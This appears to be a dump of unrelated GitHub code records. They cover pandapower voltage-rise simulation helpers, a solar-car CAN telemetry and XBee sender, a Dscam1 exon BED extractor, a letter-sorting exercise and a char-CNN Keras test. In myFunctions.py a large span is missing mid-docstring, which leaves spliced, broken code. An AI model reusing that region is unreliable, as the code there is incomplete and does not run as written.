{exists(to_file)}\")\ninput()\nout_file=open(to_file,'w')\nout_file.write(indata)\n\nin_file.close()  # close the file objects, not the filename strings\nout_file.close()\n","repo_name":"akashbhanu009/Programs","sub_path":"copy1.py","file_name":"copy1.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9498447873","text":"# List of functions used in my code\n\nimport pandapower, pandas, numpy\nfrom tqdm import tqdm # Profiling\n\npd = pandas\nnp = numpy \npp = pandapower\n############################### Variables #########################################\n\n# Create an attribute list to use in functions\nattr_list = [('bus', 'name'),\n             ('load', 'bus'),\n             ('switch', 'bus'),\n             ('line', 'from_bus'),\n             ('line', 'to_bus'),\n             ('trafo', 'hv_bus'),\n             ('trafo', 'lv_bus')]\n\n# Define the set of folders\nnetwork_folder = 'pickle_files/'\nexcel_folder = 'excel_files/'\npy_folder = 'py_files/'\n\nΔt = 1 / 6 # Time frequency 10mn ==> 1Hour/6\n\ntrain_split_date = '2021 12 31 23:50' # Date of training+validation split data, lower bound \ntrainVal_split_date = '2021 06 01' # lower date to split training and validation data\n\n############################## FUNCTIONS #########################################\n\ndef readAndReshape_input(f_name, folder_name=excel_folder, n_row2read=None):\n    \"\"\"\nRead the given file and reshape its data into a one-dimensional list.\n\n\nParameters: \n-----------\nf_name: String\n    Name of the file to load (with the correct extension)\nn_row2read : Int (default=None) \n    Number of rows to read from the file (all rows when None).\nOutput:\n-------\n    Data of the input file reshaped in a unique list\n\n    \"\"\"\n\n    filename = f\"{folder_name}{f_name}\"\n    cols_to_read = range(2, 8)  # Define index of columns to read\n    input_data = pandas.read_csv(filename,\n                                 header=None,\n                                 sep=\";\",\n                                 usecols=cols_to_read,\n                                 nrows=n_row2read)\n\n    return numpy.array(input_data).reshape(-1) / 1000  # /1000 to convert data to MW\n\n\n# ___________________________________________________________________________________________________________________________________\n# ----------------------------------------------------------------------------------------------------------------------------------\n# ___________________________________________________________________________________________________________________________________\n\ndef check_bus_connection(network, bus_number, attr_list):\n    \"\"\"\nCheck and print the connection between a bus number and all the elements in the network.\n\nParameters:\n----------\nnetwork: pandapower network\n    The network that has to be investigated\nbus_number: list of int\n    The number of the concerned bus(ses)\nattr_list: list of String tuple\n    Each tuple in the list represents an attribute to look for\n    Ex: attr_list[0] = ('bus', 'name') ==> network.bus.name must be accessed\n    \n    \"\"\"\n\n    for cur_bus in bus_number:  # For each bus\n        for attribute in attr_list:  # For each tuple in the attribute list\n            netsub = getattr(network, attribute[0])\n            netsub_sub = getattr(netsub, attribute[1])\n\n            if len(netsub[netsub_sub == cur_bus]) != 0:  # If there are some elements\n                print(\n                    f'----------****** Bus {cur_bus} net.{attribute[0]}.{attribute[1]} ******-------')\n                print(netsub[netsub_sub == cur_bus], '\\n')\n                print('\\n')\n\n\n# ___________________________________________________________________________________________________________________________________\n# 
----------------------------------------------------------------------------------------------------------------------------------\n# ___________________________________________________________________________________________________________________________________\n\ndef initialize_network_at(network: pandapower.auxiliary.pandapowerNet,\n curr_period: pandas._libs.tslibs.period,\n sum_max_main_network: tuple,\n dict_df_sgenLoad: dict):\n \"\"\"\nReturn a fixed float;\n\nInitialise the parameters of the network at the current period\n\nParameters:\n----------\nnetwork: Pandapower network\n The small network concerned ;\ncurr_period: Pandas period\n The current period to investigate;\nsum_max_main_network: tuple\n Sum of maximum power seen from the bigger network (here, saint laurent \n compared to the subnetwork civaux)\n + Of all BT energy producers => sum_max_input[0]\n + of all Load in the network => sum_max_input[1] \ndict_df_sgenLoad: dict \n Dictionary containing data (as dataframe i.e indexed by each period of \n the considered year) of the \n + df_prodHT => HT producers in the subnetwork \n + df_prod_bt_total => BT producers in the subnetwork\n + df_cons_total => Load demand subnetwork \n \n\n \"\"\"\n ## TODO : Give only the data of the current period to\n ## the function instead of that of the whole year\n\n # Initiate parameters to be used within funtion\n sum_max_p_mw_StLaurent_prodBT = sum_max_main_network[0]\n sum_max_p_mw_StLaurent_load = sum_max_main_network[1]\n\n df_prodHT = dict_df_sgenLoad['df_prodHT']\n df_prod_bt_total = dict_df_sgenLoad['df_prod_bt_total']\n df_cons_total = dict_df_sgenLoad['df_cons_total']\n\n # Initalise HT producers \n network.sgen.p_mw[network.sgen.name.notna()] = df_prodHT.loc[curr_period].values\n\n # Initialize Bt producers\n network.sgen.p_mw[network.sgen.name.isna()] = (network.sgen.\n max_p_mw[network.sgen.name.isna()] *\n df_prod_bt_total.loc[curr_period].\n values / sum_max_p_mw_StLaurent_prodBT)\n # Initialize Loads\n network.load.p_mw = (network.load.max_p_mw * df_cons_total.loc[curr_period].\n values / sum_max_p_mw_StLaurent_load)\n\n # Work with julia Power model since the load is zero\n # network.load.p_mw = (network.load.max_p_mw*df_cons_total.loc[curr_period].\n # values*0/sum_max_p_mw_StLaurent_load)\n\n\n# ___________________________________________________________________________________________________________________________________\n# ----------------------------------------------------------------------------------------------------------------------------------\n# ___________________________________________________________________________________________________________________________________\n\ndef max_vm_pu_at(network: pandapower.auxiliary.pandapowerNet,\n curr_period: pandas._libs.tslibs.period,\n net_hv_activated_bus: list,\n dict_df_sgenLoad: dict,\n opf_status=False):\n \"\"\"\nReturn a fixed float;\n\nReturn the maximum voltage over all the bus in the network for the current period.\n\nParameters:\n----------\nnetwork: Pandapower network\n The network ;\ncurr_period: Panda period\n The current period to investigate;\nnet_hv_activated_bus: List\n List of all the higher voltage activated bus in the network\ndict_df_sgenLoad: dict \n Dictionary containing data (as dataframe i.e indexed by each period of \n the considered year) of the \n + df_prodHT => HT producers in the subnetwork \n + df_prod_bt_total => BT producers in the subnetwork\n + df_cons_total => Load demand subnetwork \nofp_status: Boolean = False\n Wether 
the maximum voltage is computed after a normal or optimal power flow or both\n + Normal => **pandapower.runpp(net)**, ofp_status = False\n + Optimal => **pandapower.runopp(net)**, ofp_status = True\n \n \n \"\"\"\n\n # Initiate parameters from input\n df_prodHT = dict_df_sgenLoad['df_prodHT']\n\n if opf_status: # If status is true\n # update \n # For optimal flow, given that the sgen P0100 is contollable the optimization \n # result is to draw the maximum power with no regard to the actual power provided \n # at each instant. To eliavate this problem we would rather initialize the maximum \n # power of the said producer with the actual prooduction. \n network.sgen.at[23, 'max_p_mw'] = df_prodHT['P0100'][curr_period] # TODO give as\n # argument the index of the line (23) where the considered\n # energy producer is located\n pandapower.runopp(network) # Run network\n # pandapower.runpm_ac_opf(network) # Run network with Julia Power model:\n # Not converging for the moment, but Do converge when le load demand is low\n\n else:\n pandapower.runpp(network) # Run network\n # pandapower.runpm_pf(network) # Run network with Julia Power model:\n # Not converging for the moment, but Do converge when le load demand is low\n\n # Return the maximum voltage over all the busses in the network for the current instant\n return network.res_bus.loc[net_hv_activated_bus, 'vm_pu'].max()\n\n\n# ___________________________________________________________________________________________________________________________________\n# ----------------------------------------------------------------------------------------------------------------------------------\n# ___________________________________________________________________________________________________________________________________\n\ndef run_powerflow(network: pandapower.auxiliary.pandapowerNet,\n network_hv_activated_bus: list,\n sum_max_main_network: tuple,\n dict_df_sgenLoad: dict,\n opf_status=False):\n \"\"\"\nReturn a list of maximum voltage on the network for each period given by the index \nof element in \n\nInitialise the parameters of the network\n\nParameters:\n----------\nnetwork: Pandapower network\n The network to beimulation consider ;\ndict_df_sgenLoad: dict \n Dictionary containing data (as dataframe i.e indexed by each period of \n the considered year) of the \n + df_prodHT => HT producers in the subnetwork \n + df_prod_bt_total => BT producers in the subnetwork\n + df_cons_total => Load demand subnetwork \nsum_max_main_network: tuple\n Sum of maximum power seen from the bigger network (here, saint laurent \n compared to the subnetwork civaux)\n + Of all BT energy producers => sum_max_input[0]\n + of all Load in the network => sum_max_input[1] \nnetwork_hv_activated_bus: list\n list of all Hv bus activated in the concerned network\nofp_status: Boolean = False\n Wether the maximum voltage is computed after a normal or optimal power flow or both\n + Normal => **pandapower.runpp(net)**, ofp_status = False\n + Optimal => **pandapower.runopp(net)**, ofp_status = True\n + Both => A normal power flow is run. Only when the result i.e. 
max_vm_pu > threshold, \n is the optimal power flow run.\n \n \n \"\"\"\n\n # Creating empty list \n list_max_vm_pu = [] # Maximum vm_pu at each period considered\n list_sgen_HT = [] # Actual HT generators power after optimal flow\n\n # Initiate parameters from inputs\n df_prodHT = dict_df_sgenLoad['df_prodHT']\n\n # Initialise the network and get the maximum value for each period\n for curr_period in tqdm(df_prodHT.index):\n\n if opf_status: # Run optimal power flow\n max_vm_pu, sgen_pw_HT = run_powerflow_at(network, curr_period,\n network_hv_activated_bus,\n sum_max_main_network,\n dict_df_sgenLoad, opf_status)\n list_max_vm_pu.append(max_vm_pu)\n list_sgen_HT.append(sgen_pw_HT)\n\n else: # Run simple power flow\n list_max_vm_pu.append(run_powerflow_at(network, curr_period,\n network_hv_activated_bus,\n sum_max_main_network,\n dict_df_sgenLoad, opf_status))\n\n # Return depends on ofp_status\n if opf_status:\n return list_max_vm_pu, list_sgen_HT\n else:\n return list_max_vm_pu\n\n\n\n\n\n# ___________________________________________________________________________________________________________________________________\n# ----------------------------------------------------------------------------------------------------------------------------------\n# ___________________________________________________________________________________________________________________________________\n\ndef run_powerflow_at(network: pandapower.auxiliary.pandapowerNet,\n curr_period: pandas._libs.tslibs.period,\n network_hv_activated_bus: list,\n sum_max_main_network: tuple,\n dict_df_sgenLoad: dict,\n auth_vm_pu_max=1.02,\n opf_status=False, \n pred_model=None):\n \"\"\"\nReturn the maximum voltage on the network for the period \n\nInitialise the parameters of the network\n\nParameters:\n----------\nnetwork: Pandapower network\n The network to beimulation consider ;\ncurr_period: Panda period\n The current period to investigate;\ndict_df_sgenLoad: dict \n Dictionary containing data (as dataframe i.e indexed by each period of \n the considered year) of the \n + df_prodHT => HT producers in the subnetwork \n + df_prod_bt_total => BT producers in the subnetwork\n + df_cons_total => Load demand subnetwork \nsum_max_main_network: tuple\n Sum of maximum power seen from the bigger network (here, saint laurent \n compared to the subnetwork civaux)\n + Of all BT energy producers => sum_max_input[0]\n + of all Load in the network => sum_max_input[1] \nnetwork_hv_activated_bus: list\n list of all Hv bus activated in the concerned network\nauth_vm_mu_max: Threshold of maximum voltage allowed on the network. Only used when the last\n input `ofp_status` is 'Both';\nofp_status: Boolean = False\n Wether the maximum voltage is computed after a normal or optimal power flow or both\n + Normal => **pandapower.runpp(net)**, ofp_status = False\n + Optimal => **pandapower.runopp(net)**, ofp_status = True\n + Both => A normal power flow is run. Only when the result i.e. max_vm_pu > threshold, \n is the optimal power flow run.\npred_model: String\n Which kind of prediction model to use for the all the variables to predict at current period\n + Pers => Persistence model i.e. val(k)= val(k-1)\n\n \n \n \"\"\"\n\n # Check variables congruence \n check_var_concordance(opf_status, pred_model) \n \n \n # -- GT1\n if pred_model == 'Pers': # if the the prediction model is the persistance,\n curr_period = curr_period-1\n \n \n # Initialize the network. 
See the corresponding function for more explanation\n initialize_network_at(network, curr_period,\n sum_max_main_network, dict_df_sgenLoad)\n\n # Get the maximum voltage magnitude of all activated bus to a list. See the \n # corresponding function for more explanation\n if opf_status == True: # Run optimal power flow *********************************************\n\n # get maximum value of vm_pu for the current period after optimal power flow\n cur_max_vm_pu = max_vm_pu_at(network, curr_period,\n network_hv_activated_bus,\n dict_df_sgenLoad, opf_status)\n\n # Get the value of HT producer after optimal flow. \n # HT producer results are in res_sgen.p_mw[21:]\n sgen_pw_HT = list(network.res_sgen.p_mw[21:])\n\n return cur_max_vm_pu, sgen_pw_HT\n\n elif opf_status == 'Both': # Run normal and depending on the situation, also optimal power flow *******\n # run normal power flow first \n cur_max_vm_pu = max_vm_pu_at(network, curr_period, network_hv_activated_bus,\n dict_df_sgenLoad, False)\n max_vm_pu_pf = cur_max_vm_pu # Save the maximum voltage given by the power flow \n # before optimizing\n # If the maximum voltage on buses is above the authorized threshold, run opf\n if cur_max_vm_pu > auth_vm_pu_max:\n cur_max_vm_pu = max_vm_pu_at(network, curr_period,\n network_hv_activated_bus,\n dict_df_sgenLoad, True)\n\n # Get the value of HT producer after optimal flow. \n # HT producer results are in res_sgen.p_mw[21:]\n sgen_pw_HT = list(network.res_sgen.p_mw[21:])\n\n # Depending on the prediction model parameter the return is different----------\n # For given that at GT1 the \n # one must reset curr_period to its initial value using \n # before ruturning the results\n if pred_model == 'Pers': return [max_vm_pu_pf, cur_max_vm_pu], sgen_pw_HT, curr_period+1\n else: return [max_vm_pu_pf, cur_max_vm_pu], sgen_pw_HT, curr_period\n\n elif opf_status == False : # Run normal power flow *******************************************************\n return max_vm_pu_at(network, curr_period, network_hv_activated_bus,\n dict_df_sgenLoad, opf_status)\n \n else : \n raise ValueError(' must be either of [True, False, ''Both'']' ) \n\n\n\n\n# ___________________________________________________________________________________________________________________________________\n# ----------------------------------------------------------------------------------------------------------------------------------\n# ___________________________________________________________________________________________________________________________________\n\ndef extract_par_results(parallel_result, df_prodHT):\n \"\"\"\nExtract and save the result of the parallel computation in a dataframe that is output\n\nParameters: \n--------------\nparallel_result: ipyparallel.client.asyncresult.AsyncMapResult\n Output given by dview.gather('var_name') where var_name is the name of the\n list comprehension used to run the parallel computing.\ndf_prodHT: Dataframe\n Dataframe containing data of all the HT producers in the network\n\n\nOutput:\n---------\nDataframe as:\n max_vm_pu : Maximum voltage recorded over all the bus at the instant given \n by the df.index\n Other columns : THe injected power of the respective HT producers.\n\n\n \"\"\"\n\n # Get all the elements from the parallel result in a list\n # elm[0] : Maximum voltage on all the line \n # elm[1][0]: Power injected into the network by the first HT producer \n # ...\n # elm[1][n]: Power injected into the network by the last HT producer i.e. 
P0100 \n # elm[2] : Period index associated to all the previous output variable\n\n # elm[0] can either be a list of [max_vm_pu_pf : max voltage before opf\n # max_vm_pu : maximum voltage after opf] \n # or a single float which is max_vm_pu : maximum voltage after opf. \n # See the function run_powerflow_at (*args, ofp_status='both', pred_model= 'Pers')\n if type(parallel_result[0][0]) is list: \n sep_list = [(*elm[0], *elm[1], elm[2]) for elm in parallel_result]\n # Create a colums using 'vm_pu_max' and add the HT producers name\n colls = ['max_vm_pu_pf', 'max_vm_pu'] + df_prodHT.columns.to_list()\n else:\n sep_list = [(elm[0], *elm[1], elm[2]) for elm in parallel_result]\n # Create a colums using 'vm_pu_max' and add the HT producers name\n colls = ['max_vm_pu'] + df_prodHT.columns.to_list()\n \n \n data_input = np.array(np.array(sep_list)[:, :-1], dtype=float)\n index_list = np.array(sep_list)[:, -1]\n\n # create new dataframe based on previous unpack data\n df = pd.DataFrame(data=data_input, index=index_list, columns=colls)\n\n # return the newly create dataFrame with the index sorted \n return df.sort_index()\n\n\n\n\n\n# ___________________________________________________________________________________________________________________________________\n# ----------------------------------------------------------------------------------------------------------------------------------\n# ___________________________________________________________________________________________________________________________________\n\ndef check_var_concordance(opf_status=False, pred_model=None):\n \"\"\"\nCheck the congruence between the optimal power flow variable and the type of prediction model.\n\nParameters:\n----------\nofp_status: Boolean = False\n Wether the maximum voltage is computed after a normal or optimal power flow or both\n + Normal => **pandapower.runpp(net)**, ofp_status = False\n + Optimal => **pandapower.runopp(net)**, ofp_status = True\n + Both => A normal power flow is run. Only when the result i.e. max_vm_pu > threshold, \n is the optimal power flow run.\npred_model: String\n Which kind of prediction model to use for the all the variables to predict at current period\n + Pers => Persistence model i.e. val(k)= val(k-1)\n\n \n \"\"\"\n \n pred_model_values = ['Pers']\n \n # If the prediction model is defined, make sure that the ='Both'\n if(pred_model is not None):\n if pred_model not in pred_model_values: # chef if the pred_model value is an authorised\n raise ValueError(' must be either of', pred_model_values ) \n \n if opf_status != 'Both': # \n raise ValueError('Given that is defined, must be set to <\\'Both\\'> ')\n\n \n \n \n \n# ___________________________________________________________________________________________________________________________________\n# ----------------------------------------------------------------------------------------------------------------------------------\n# ___________________________________________________________________________________________________________________________________ \n \ndef improve_persinstence(per_extracted_res_df: pandas.core.frame.DataFrame, \n prodHT_df: pandas.core.frame.DataFrame,\n auth_vm_mu_max: float, \n h_start_end = ['11:00','14:00']):\n# Implement : * Inject all the production as long as max_vm_pu_pf < vm_mu_max, i.e. \n# no voltage rise is detected \n \"\"\"\nImprove the results given by the persistence model. 
If a voltage rise is not predicted by \nthe persistence model at a certain period, the controllable sgens is allowed to inject all \nits power into the grid. Otherwise the energy producer can inject at most the predicted power \nby the persistence model. \n\n\nParameters\n----------\nper_extracted_res_df: dataframe\n Result given by the persistence model. \n Output of <sig_thresh).astype(int) # convert prediction into a binary variablethe prediction\n \n # Return the prediction of the RNN and the time period associated ()\n return pred_bin[0][0], history_last_ind+1\n\n\n\n\n\n\n# ___________________________________________________________________________________________________________________________________\n# ----------------------------------------------------------------------------------------------------------------------------------\n# ___________________________________________________________________________________________________________________________________ \ndef robustPred(model_Vrise_dict, P0100_no_control, P0100_opt_model1, auth_vm_mu_max, n_models=None ):\n \"\"\"\nDefine Robust prediction bloc: \n\n\nPrameters:\n--------------\nmodel_Vrise_dict: Dict\n Dictionary of the voltage rise for each model \nP0100_no_control : pandas dataframe\n Values of the controlled Generator P0100 when no controled is applied\nP0100_opt_model1 : pandas Dataframe. Partial output of function <>\n Optimal value of P0100 at the end of bloc PF/OPF of model1. This is the \n command value to send to the said producer when the robustPred \n predicts a voltage rise above the threshold vm_mu_max.\nauth_vm_mu_max: Threshold of maximum voltage on the network\nn_models: Int or string\n Int: Number of models which must agree on voltage rise above threshold before\n a command is set to P0100\n ** 1: At Least one of the models\n ** 2: At least two of the models\n ** 3: All three models\n String: \n Name of the Model which voltage rise above threshold prediction is considered\n 'Modelx' where x in {1,2,3}\n \n\nOutput: \n---------\nnew_p0100_df: panda dataframe\n y_optimal after combined model\n \n \"\"\"\n \n\n # Extract model voltage rise from Input dictionary \n model1_Vrise, model2_Vrise, model3_Vrise = (model_Vrise_dict['Model1'], \n model_Vrise_dict['Model2'], \n model_Vrise_dict['Model3'])\n \n mask_per2work = model1_Vrise.index # Get index of the considered period\n vect_int = np.vectorize(int) # vectorized version of int\n\n # Create an empty dataframe i.e. 
binary threshold \n bin_thresh_df = pd.DataFrame(index=mask_per2work)\n\n # add the binary output of three models to the created df\n bin_thresh_df[['Model3']] = model3_Vrise.values\n bin_thresh_df[['Model2']] = vect_int(model2_Vrise>auth_vm_mu_max)\n bin_thresh_df[['Model1']] = vect_int(model1_Vrise>auth_vm_mu_max)\n\n # Combined_output of all models\n bin_thresh_df[['Model_All']] = np.array(bin_thresh_df.sum(axis=1)).reshape((-1,1))\n\n \n # Create a new dataframe for the controlled SGEN based on its real values \n new_p0100_df = P0100_no_control.loc[mask_per2work, ['P0100']]\n\n \n if type(n_models) is str :# If n_model is a string\n if n_models in model_Vrise_dict.keys(): # Check if the sting input is in the model Dict\n vrise_true_mask = bin_thresh_df[n_models] == 1 # Create the mask using only the \n # period where the concerned model predict there is an voltage rise\n else: raise ValueError('Since is a string it must be be either of', list(model_Vrise_dict.keys())) \n \n elif type(n_models) is int: # If n_model is int \n if n_models <= 3:\n # Create mask of instants where at least n models agrees on voltage rise above threshold \n vrise_true_mask = bin_thresh_df.Model_All>= n_models \n else: raise ValueError('Since is an int it must be defined such that 0 < n_models <= 3 ')\n \n else: raise ValueError(' is the wrong type. Must either be an int or a string')\n\n # Use vrise_true_mask to insert predicted values given by model1 at the concerned instants \n new_p0100_df[vrise_true_mask] = P0100_opt_model1.loc[mask_per2work].loc[vrise_true_mask, ['P0100']]\n \n return new_p0100_df, bin_thresh_df\n\n\n","repo_name":"pajjaecat/Saint_Laurent_De_Jourdes","sub_path":"py_files/myFunctions.py","file_name":"myFunctions.py","file_ext":"py","file_size_in_byte":31998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15631712331","text":"from typing import cast\nfrom time import sleep\nfrom threading import Thread, Lock\nfrom pathlib import Path\nfrom copy import deepcopy\n\nimport can\nimport cantools.database\nfrom cantools.database.can.database import Database\nfrom cantools.typechecking import SignalDictType\nfrom digi.xbee.devices import XBeeDevice\n\nfrom src import ROOT_DIR, BUFFERED_XBEE_MSG_END\nfrom src.can.row import Row\nfrom src.util import add_dbc_file, find, unwrap\n\nimport src.car_gui as car_display\nimport src.can_db as can_db\n\nVIRTUAL_BUS_NAME = \"virtbus\"\n\nPORT = \"/dev/ttyUSB0\"\nBAUD_RATE = 9600\nREMOTE_NODE_ID = \"Node\"\n\nxbee = None\nremote = None\nstore_data = False\nshould_send = False\nshould_display = True\n\n# Thread communication globals\nrow_lock = Lock()\n\n# The database used for parsing with cantools\ndb = cast(Database, cantools.database.load_file(Path(ROOT_DIR).joinpath(\"resources\", \"mppt.dbc\")))\nadd_dbc_file(db, Path(ROOT_DIR).joinpath(\"resources\", \"motor_controller.dbc\"))\nadd_dbc_file(db, Path(ROOT_DIR).joinpath(\"resources\", \"bms_altered.dbc\"))\n\nif store_data:\n # Connection\n conn = can_db.connect(\"can_sending_db\")\n\nif store_data:\n # Connection\n conn = can_db.connect(\"can_sending_db\")\n\n# The rows that will be added to the database\nrows = [Row(db, node.name) for node in db.nodes]\n\ndef get_packets(interface) -> iter:\n \"\"\"Generates CAN Packets.\"\"\"\n if interface == 'canusb':\n with serial.Serial(SERIAL_PORT, SERIAL_BAUD_RATE) as receiver:\n while(True):\n raw = receiver.read_until(b';').decode()\n if len(raw) != 23: continue\n raw = raw[1:len(raw) - 1]\n raw = 
raw.replace('S', '')\n raw = raw.replace('N', '')\n tag = int(raw[0:3], 16)\n data = bytearray.fromhex(raw[3:])\n sleep(.1)\n yield can.Message(arbitration_id=tag, data=data)\n elif interface == 'pican':\n with can.interface.Bus(channel='can0', bustype='socketcan') as bus:\n for msg in bus:\n tag = msg.arbitration_id\n data = msg.data\n yield can.Message(arbitration_id=tag, data=data)\n else:\n raise Exception('Invalid interface')\n\ndef row_accumulator_worker(bus: can.ThreadSafeBus):\n global car_display\n \"\"\"\n Observes messages sent on the `bus` and accumulates them in a global row.\n \"\"\"\n for msg in get_packets(\"pican\"):\n assert msg is not None\n\n row = find(rows, lambda r: r.owns(msg, db))\n if row is not None:\n row = unwrap(row)\n\n # i = next(i for i, r in enumerate(rows) if r.owns(msg, db))\n decoded = cast(SignalDictType, db.decode_message(msg.arbitration_id, msg.data))\n with row_lock:\n for k, v in decoded.items():\n row.signals[k].update(v)\n if k in car_display.displayables.keys():\n car_display.displayables[k] = v\n # print(car_display.displayables)\n\n \n # decoded = cast(SignalDictType, db.decode_message(msg.arbitration_id, msg.data))\n # with row_lock:\n # for k, v in decoded.items():\n # rows[i].signals[k].update(v)\n\n\n# TODO: Buffering sucks. Get rid of the need for this (with more space-efficient serialization).\ndef buffered_payload(payload: str, chunk_size: int = 256, terminator: str = BUFFERED_XBEE_MSG_END) -> list[str]:\n payload += terminator\n return [payload[i:i + chunk_size] for i in range(0, len(payload), chunk_size)]\n\ndef sender_worker():\n \"\"\"\n Serializes rows into the queue.\n \"\"\"\n while True:\n sleep(2.0)\n with row_lock:\n copied = deepcopy(rows)\n for row in copied:\n row.stamp()\n if store_data:\n can_db.add_row(conn, row.timestamp, row.signals.values(), row.name)\n for chunk in buffered_payload(row.serialize()):\n print(chunk)\n print(\"\\n\")\n if should_send:\n xbee.send_data(remote, chunk)\n\ndef startXbee():\n global xbee, remote\n xbee = XBeeDevice(PORT, BAUD_RATE)\n xbee.open()\n\n remote = xbee.get_network().discover_device(REMOTE_NODE_ID)\n assert remote is not None\n\n\n#displays the car gui, receives can data, stores it, and sends it over the xbees\nif __name__ == \"__main__\":\n if should_send:\n startXbee()\n if store_data:\n for row in rows:\n can_db.create_tables(conn, row.name, row.signals.items())\n print(\"ready to receive\")\n # Start the bus\n # Create a thread to read of the bus and maintain the rows\n accumulator = Thread(target=row_accumulator_worker,\n args=(can.ThreadSafeBus(channel='can0', bustype='socketcan'),),\n daemon=True)\n\n # # Create a thread to serialize rows as would be necessary with XBees\n sender = Thread(target=sender_worker, daemon=True)\n\n # Start the threads\n accumulator.start()\n sender.start()\n\n #display\n if should_display:\n root = car_display.CarDisplay()\n root.mainloop()\n\n # Spin forever.\n while True: ...\n","repo_name":"nusolar/SC7s","sub_path":"telemetry-python/scripts/CAN_Display.py","file_name":"CAN_Display.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73955213928","text":"#!/usr/bin/env python\n\n# Script: \"11-16_get-all-dscam-exons.py\"\n# (specific ~one-time use)\n# Requires: Python 3\n# Purpose: Sensibly extract a BED record per Dscam1 exon in the 75 Dscam1\n# transcripts found in the Ensembl Dme v89 annotation.\n# Usage: 11-16_get-all-dscam-exons.py 
Drosophila_melanogaster.BDGP6.89.gtf\n# Author: Matthew Bauer\n\nimport sys\n\ndef process_gtf_record(rec):\n \"\"\"Extract relevant information from the given GTF record.\"\"\"\n fields = rec.split('\\t')\n info = {}\n info['chr'] = fields[0]\n info['feature'] = fields[2]\n info['start'] = int(fields[3])-1 # conv to 0-based\n info['end'] = int(fields[4]) # no conversion needed\n for attr in fields[8].split(';'):\n attr = attr.strip()\n if attr:\n parts = attr.split(' ')\n info[parts[0]] = parts[1].strip('\"')\n return info\n\nexons = [[] for _ in range(25)]\n# extract info from file\nwith open(sys.argv[1]) as fin:\n for line in fin:\n line = line.rstrip()\n if (not line) or line.startswith('#!'):\n continue\n info = process_gtf_record(line)\n if (info['gene_name'] == 'Dscam1' and info['feature'] == 'exon'):\n interval = (info['start'], info['end'])\n exon_num = int(info['exon_number'])\n if interval not in exons[exon_num]:\n exons[exon_num].append(interval)\n# sort all the intervals\nfor intvls in exons:\n intvls.sort(key=lambda i: i[0])\n# write BED records for them\nfor exon_num, exon_vers in enumerate(exons):\n for ver_num, ver in enumerate(exon_vers):\n sys.stdout.write(\n '2R\\t{start}\\t{end}\\t{exon}.{ver}\\n'.format(\n start=ver[0], end=ver[1], exon=exon_num, ver=ver_num+1))\n","repo_name":"bauersmatthew/cybio","sub_path":"specific/11-16_get-all-dscam-exons.py","file_name":"11-16_get-all-dscam-exons.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26465456094","text":"import string\n\n\nclass Solution:\n def sortLetters(self, chars):\n left, right = 0, len(chars) - 1\n while left <= right:\n while left <= right and str(chars[left]).islower():\n left += 1\n while left <= right and str(chars[right]).isupper():\n right -= 1\n if left < right:\n temp = chars[left]\n chars = chars[:left] + chars[right] + chars[left + 1:]\n chars = chars[:right] + temp + chars[right + 1:]\n left += 1\n right -= 1\n print(chars)\n\n\nchars = 'Ca'\ns = Solution()\ns.sortLetters(chars)\n","repo_name":"sassyst/leetcode-python","sub_path":"lintcode/TwoPointers/SortLettersByCase.py","file_name":"SortLettersByCase.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22187923006","text":"import os\nimport unittest\n\nfrom src.data.load_data import load_csv, batch_iter\nfrom src.data.preprocess_data import Preprocessor\nfrom src.models.char_cnn.model import build_model\nfrom src.models.char_cnn.config import ModelConfig, TrainingConfig\n\nfrom keras.optimizers import Adam\n\n\nclass TestCharCNN(unittest.TestCase):\n\n def setUp(self):\n self.filename = os.path.join(os.path.dirname(__file__), 'data/test.csv')\n\n def test_train(self):\n X_train, y_train = load_csv(self.filename)\n X_valid, y_valid = load_csv(self.filename)\n p = Preprocessor()\n p.fit(X_train, y_train)\n model_config = ModelConfig(vocab_size=len(p.vocab), nb_class=len(p.classes))\n training_config = TrainingConfig()\n train_batches, train_steps = batch_iter(X_train, y_train, training_config.batch_size, p)\n valid_batches, valid_steps = batch_iter(X_valid, y_valid, training_config.batch_size, p)\n\n model = build_model(model_config.kernel_sizes,\n model_config.dense_units,\n model_config.vocab_size,\n model_config.nb_filter,\n model_config.nb_class,\n model_config.keep_prob,\n model_config.maxlen)\n 
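The sortLetters solution above performs each swap by rebuilding the string with slicing and concatenation, which costs O(n) per swap. Below is a sketch of the same two-pointer case partition over a mutable list of characters, where each swap is O(1); returning the result instead of printing it is my adaptation, not part of the original solution.

def sort_letters(chars: str) -> str:
    # Same invariant as the solution above: everything left of `left` is
    # lowercase, everything right of `right` is uppercase.
    buf = list(chars)
    left, right = 0, len(buf) - 1
    while left <= right:
        while left <= right and buf[left].islower():
            left += 1
        while left <= right and buf[right].isupper():
            right -= 1
        if left < right:
            buf[left], buf[right] = buf[right], buf[left]  # O(1) in-place swap
            left += 1
            right -= 1
    return ''.join(buf)

print(sort_letters('Ca'))  # prints 'aC', matching the original's output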
model.compile(loss='categorical_crossentropy',\n                      optimizer=Adam(),\n                      metrics=['accuracy'])\n        model.fit_generator(generator=train_batches,\n                            steps_per_epoch=train_steps,\n                            validation_data=valid_batches,\n                            validation_steps=valid_steps,\n                            epochs=training_config.max_epoch)\n","repo_name":"Hironsan/awesome-text-classification","sub_path":"tests/test_char_cnn.py","file_name":"test_char_cnn.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"53"}
